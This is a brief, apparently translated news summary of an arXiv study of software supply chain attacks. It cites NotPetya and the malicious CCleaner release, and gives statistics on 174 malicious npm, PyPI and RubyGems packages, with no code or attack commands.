German and French researchers published on the preprint website arXivpaper(PDF) Analysis of open source software supply chain attacks over the past few years. A well-known example of a software supply chain attack that infects end users with malicious code embedded in software products is a NotPetya extortion software attack in Ukraine.
The attacker hacked into the update server of Ukraine's popular accounting software and released malicious updates. The attack cost billions of dollars and is one of the most destructive cyber attacks known.
Another example is the malicious version of CCleaner, which has been downloaded 2.3 million times in more than a month. Another kind of software supply chain attack is to implant malicious code into the dependent packages of software products. With the popularity of open source software development mode, such attacks are increasingly common.
Researchers analyzed 174 malicious dependency packages found by the npm、PyPI and RubyGems software package management system. They found that 56% of packages triggered malicious behavior when installed, and 41% used additional conditions to determine whether to run. Sixty-one percent of malicious packages use name similarity to implant malicious packages into open source ecosystems. The main purpose of an attacker is to extract data.